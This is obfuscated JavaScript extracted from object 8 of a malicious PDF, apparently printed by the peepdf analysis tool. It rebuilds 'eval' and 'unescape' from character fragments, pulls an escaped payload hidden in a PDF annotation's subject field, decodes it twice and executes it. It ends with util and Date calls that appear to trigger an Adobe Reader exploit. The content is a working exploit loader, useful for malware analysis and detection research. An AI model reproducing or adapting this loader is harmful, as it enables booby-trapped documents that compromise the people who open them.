// peepdf comment: Javascript code located in object 8 (version 0)

var ll = ["x", "%", "a", "s"];
var nnn = "" + /*nmm_ududu_888f8f*/
ll[1] /*nmm_ududu_888f8f*/
;
var nnn2 = "" + /*nmm_ududu_888f8f*/
"a" /*nmm_ududu_888f8f*/
;

function sshujjjdkkkidkkkdk_99d9d9ddd(nmm_ududu_888f8f) {
    if (nmm_ududu_888f8f == 1 /*nmm_ududu_888f8f*/ ) return ( /*nmm_ududu_888f8f*/ /*nmm_ududu_888f8f*/ app["v" + "ie" /*nmm_ududu_888f8f*/ + "" /*nmm_ududu_888f8f*/ + "werTy" + app.doc["U" + "" + "RL"][3] + "e"][1] /*nmm_ududu_888f8f*/ );
    if (nmm_ududu_888f8f == 2 /*nmm_ududu_888f8f*/ ) return ( /*nmm_ududu_888f8f*/ /*nmm_ududu_888f8f*/ nnn /*nmm_ududu_888f8f*/ );
    if (nmm_ududu_888f8f == 3 /*nmm_ududu_888f8f*/ ) return ( /*nmm_ududu_888f8f*/ /*nmm_ududu_888f8f*/ nnn2 /*nmm_ududu_888f8f*/ );
}

var /*nmm_ududu_888f8f*/
OEWfgVHGRB77 /*nmm_ududu_888f8f*/
= /*nmm_ududu_888f8f*/
this /*nmm_ududu_888f8f*/
; /*nmm_ududu_888f8f*/

var rcORkrbecl89 = ["", sshujjjdkkkidkkkdk_99d9d9ddd(1), sshujjjdkkkidkkkdk_99d9d9ddd(2), sshujjjdkkkidkkkdk_99d9d9ddd(3), "", "", "o", "s", "c", "i", "g", "t", "r", "u", "n", "p"]; /*nmm_ududu_888f8f*/

var /*nmm_ududu_888f8f*/
OEWfgVHGRB77z /*nmm_ududu_888f8f*/
= /*nmm_ududu_888f8f*/
app /*nmm_ududu_888f8f*/
; /*nmm_ududu_888f8f*/
var bIgPvheteJ1 = rcORkrbecl89[1]; /*nmm_ududu_888f8f*/
var Piwmwvbyza3 = rcORkrbecl89[2]; /*nmm_ududu_888f8f*/
var oEmEWBKzuN17 = OEWfgVHGRB77[bIgPvheteJ1 + "v" + rcORkrbecl89[3] + "l"]; /*nmm_ududu_888f8f*/
var FZVxDKErRa18 = OEWfgVHGRB77[rcORkrbecl89[13] + rcORkrbecl89[14] + bIgPvheteJ1 + "s" + rcORkrbecl89[8] + rcORkrbecl89[3] + rcORkrbecl89[15] + bIgPvheteJ1]; /*nmm_ududu_888f8f*/

oEmEWBKzuN17("v" + rcORkrbecl89[3] + "r fHrepHnGWC15 = / Wel" + "come to DSD Gui" + "delin /" + rcORkrbecl89[9] + rcORkrbecl89[10] + ";"); /*nmm_ududu_888f8f*/
var zXiVOeiilS10 = OEWfgVHGRB77z[ /*nmm_ududu_888f8f*/ "d" + rcORkrbecl89[7 - 1] + rcORkrbecl89[7 + 1]]; /*nmm_ududu_888f8f*/
zXiVOeiilS10[rcORkrbecl89[7] + "yn" + rcORkrbecl89[8] + "A" + rcORkrbecl89[14] + rcORkrbecl89[14] + "o" + rcORkrbecl89[11] + "S" + rcORkrbecl89[8] + rcORkrbecl89[3] + "n"](); /*nmm_ududu_888f8f*/
var ybiereMWXq4 = zXiVOeiilS10[rcORkrbecl89[10] + bIgPvheteJ1 + "tAnn" + rcORkrbecl89[6] + rcORkrbecl89[11] + rcORkrbecl89[7]](0); /*nmm_ududu_888f8f*/
var fSIOeypTEp5 = ybiereMWXq4[0][rcORkrbecl89[7] + "ubj" + bIgPvheteJ1 + rcORkrbecl89[8] + rcORkrbecl89[11]]; /*nmm_ududu_888f8f*/
var CTXyFTuhSu6 = fSIOeypTEp5 /*nmm_ududu_888f8f*/
[rcORkrbecl89 /*nmm_ududu_888f8f*/ [11 + 1] + bIgPvheteJ1 + /*nmm_ududu_888f8f*/ rcORkrbecl89[15] + "l" /*nmm_ududu_888f8f*/ + rcORkrbecl89 /*nmm_ududu_888f8f*/ [3] + rcORkrbecl89 /*nmm_ududu_888f8f*/ [8] + bIgPvheteJ1] /*nmm_ududu_888f8f*/
(fHrepHnGWC15, Piwmwvbyza3); /*nmm_ududu_888f8f*/
var HRVqvNUHjs7 = FZVxDKErRa18(FZVxDKErRa18(CTXyFTuhSu6));
oEmEWBKzuN17(HRVqvNUHjs7);

if (j) {
    function adasfdsasa() {
        util[dasfdsasa2](dasfdsasa, new Date());
    }
    adasfdsasa();
    adasfdsasa();
    try {
        this[dasfdsasa4][dasfdsasa3](null);
    } catch (e) {}
    adasfdsasa();
}

